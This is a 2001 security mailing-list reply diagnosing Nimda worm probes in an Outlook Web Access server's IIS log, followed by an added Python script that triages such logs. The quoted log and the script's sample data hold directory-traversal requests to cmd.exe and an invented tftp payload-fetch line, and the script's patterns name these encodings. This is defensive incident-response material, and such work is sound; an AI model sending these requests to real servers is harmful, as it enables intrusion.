Re: Help with OWA hack?
From: ___cliff rayman___ (cliff@genwax.com)
Date: 10/06/01
- Previous message: vertigo: "Re: analyse this!"
- In reply to: Mark Palmer, CCNA: "RE: Help with OWA hack?"
- Next in thread: Sean Waddell: "Re: Help with OWA hack?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <3BBE3A22.CEC0BD66@spamless.genwax.com>
Date: Fri, 05 Oct 2001 15:54:26 -0700
From: ___cliff rayman___ <cliff@genwax.com>
To: "Mark Palmer, CCNA" <palmerm@concordia.edu>
Subject: Re: Help with OWA hack?
This is Nimda. It has been running at full speed for
about 2 weeks now. I do not run Windows on the
Internet, but I believe you might have a problem with
this machine now, based on the 500 internal server
errors in this log.

If this machine has been compromised, you will
probably need to wipe it clean and reinstall the
software from known good media. Then go to
the Microsoft website and download all the needed
patches. Somebody more familiar with the Microsoft
site can give you the exact location.

Continue to monitor this e-mail conference along with
BugtraqNT so that you keep up to date on all vulnerabilities
associated with Windows.

Start your search for information here:
"Mark Palmer, CCNA" wrote:
> I am relatively new to all this 2000 stuff. I have found some weird stuff
> in the syslog of an OWA machine on our network:
>
> 2001-10-03 14:58:11 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/root.exe /c+dir 404 3396 72 62 HTTP/1.0 www - - -
> 2001-10-03 14:58:13 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /MSADC/root.exe /c+dir 403 3439 70 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:15 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /c/winnt/system32/cmd.exe /c+dir 404 3396 80 16 HTTP/1.0 www - - -
> 2001-10-03 14:58:17 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /d/winnt/system32/cmd.exe /c+dir 404 3396 80 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:28 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:29 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3396 117 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:31 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3396 117 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:36 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
> /c+dir 403 3439 145 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:38 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 0 97 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:48 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:50 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:51 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:55 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 98 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:56 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
> 2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 100 0 HTTP/1.0 www - - -
> 2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
>
> What is this? I imagine it's some kind of hack. How do I prevent this? I
> cannot use the lockdown tool as this is a machine running Outlook Web
> Access.
>
> Thanks for the help.
>
> Regards,
> Mark Palmer
--
___cliff rayman___ cliff@genwax.com http://www.genwax.com/
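As an added example (not code from either poster, and not part of the original thread), the following Python script shows how to triage an IIS W3C extended log for the probe pattern Mark posted. It parses the #Fields directive, flags requests for cmd.exe or root.exe and the directory-traversal encodings seen in the log, and applies the distinction cliff draws: 403/404 means the probe was rejected, 500 means IIS mapped the path onto an executable and something went wrong while running it, and 200 means the command returned output. The sample log is constructed from the entries quoted above (with A.B.C.D standing in for the real address), the #Fields header is an assumption about the server's log format, and the final line (a 200 with a tftp fetch in the query, which is the worm's second stage after a probe that works) is invented to show what a successful attack would look like; the overlong UTF-8 sequences %c0%af and %c1%1c are the ones the traversal bug in unpatched IIS 4/5 decoded as / and \ after its path check, and the Á in the quoted log is how the raw 0xC1 byte is rendered.

```python
"""Triage IIS W3C-extended log entries for Nimda / Code Red II style probes.

Added example for the thread above, not code from the original posters.
SAMPLE_LOG is constructed from the entries quoted in the thread; the
#Fields header and the last (tftp) line are assumptions.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)
2001-10-03 14:58:11 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/root.exe /c+dir 404 3396 72 62 HTTP/1.0 www - - -
2001-10-03 14:58:13 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /MSADC/root.exe /c+dir 403 3439 70 0 HTTP/1.0 www - - -
2001-10-03 14:58:28 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
2001-10-03 14:58:38 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 0 97 0 HTTP/1.0 www - - -
2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
2001-10-03 15:00:41 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /exchange/ - 200 1532 310 15 HTTP/1.1 www Mozilla/4.0 - -
2001-10-03 15:02:17 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp%20-i%20A.B.C.D%20GET%20Admin.dll 200 1410 118 31 HTTP/1.0 www - - -
"""

# Executables the worms ask for: cmd.exe through a traversal, and root.exe,
# the copy of cmd.exe that Code Red II dropped into /scripts and /MSADC.
TARGET_BINARIES = ("cmd.exe", "root.exe")

# Traversal encodings: literal ../ and ..\, the %5c and %2f forms from the
# thread, the overlong UTF-8 forms %c0%af ('/') and %c1%1c ('\') that an
# unpatched IIS decoded after its path check, the double-encoded %255c and
# %252f variants, and the raw 0xC1 byte as IIS may render it in the log.
TRAVERSAL = re.compile(
    r"\.\.(?:%5c|%2f|%c0%af|%c1%1c|%255c|%252f|\xc1|/|\\)", re.IGNORECASE
)

# 'dir' is the worm's probe; a tftp fetch in the query is the payload stage
# that only follows a probe that worked.
FOLLOW_UP = re.compile(r"(?:^|\+|%20)tftp(?:\+|%20|$)", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("log entry before #Fields directive")
        values = line.split()  # W3C format writes spaces inside fields as '+'
        if len(values) != len(fields):
            raise ValueError("field count mismatch: %r" % line)
        yield dict(zip(fields, values))


def classify(entry):
    """Return (severity, reason) for one entry, or None if it looks benign."""
    stem = entry.get("cs-uri-stem", "")
    query = entry.get("cs-uri-query", "-")
    status = entry.get("sc-status", "")
    # One level of decoding makes %5c / %2f compare like their literal forms;
    # the raw stem is checked too because the overlong forms never decode cleanly.
    decoded = unquote(stem)
    hits_binary = any(decoded.lower().endswith(b) for b in TARGET_BINARIES)
    traversal = bool(TRAVERSAL.search(stem) or TRAVERSAL.search(decoded))
    if not hits_binary and not traversal:
        return None
    rejected = status in ("403", "404")
    if hits_binary and not rejected and FOLLOW_UP.search(query):
        return ("critical", "payload fetch via tftp handed to cmd.exe")
    if hits_binary and status == "200":
        return ("critical", "cmd.exe/root.exe returned output (200): command ran")
    if hits_binary and status == "500":
        return ("high", "path mapped onto an executable and failed (500): investigate")
    return ("low", "probe rejected or not mapped (%s)" % status)


def triage(text):
    """Return the suspicious entries with their verdicts, in log order."""
    findings = []
    for entry in parse_w3c(text):
        verdict = classify(entry)
        if verdict:
            findings.append({
                "time": entry["date"] + " " + entry["time"],
                "client": entry["c-ip"],
                "request": entry["cs-uri-stem"] + "?" + entry["cs-uri-query"],
                "status": entry["sc-status"],
                "severity": verdict[0],
                "reason": verdict[1],
            })
    return findings


def worst_severity(findings):
    """Highest severity among the findings, or None when there are none."""
    order = {"low": 0, "high": 1, "critical": 2}
    return max((f["severity"] for f in findings), key=order.get, default=None)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f["time"], f["client"], f["status"], f["severity"].upper(),
              f["request"], "-", f["reason"])
    print("worst:", worst_severity(results))
```

Run against a real log, the script reads one of the files from the IIS log directory in place of SAMPLE_LOG; a 500 on a cmd.exe path is the signal cliff is reacting to, and it should be treated as "investigate the host", not as proof of compromise on its own, since it says only that IIS got as far as trying to run something at that path. A 200 on the same path, or any tftp in the query string, means the command ran and the box has to be treated as compromised, which is where the wipe-and-reinstall advice applies.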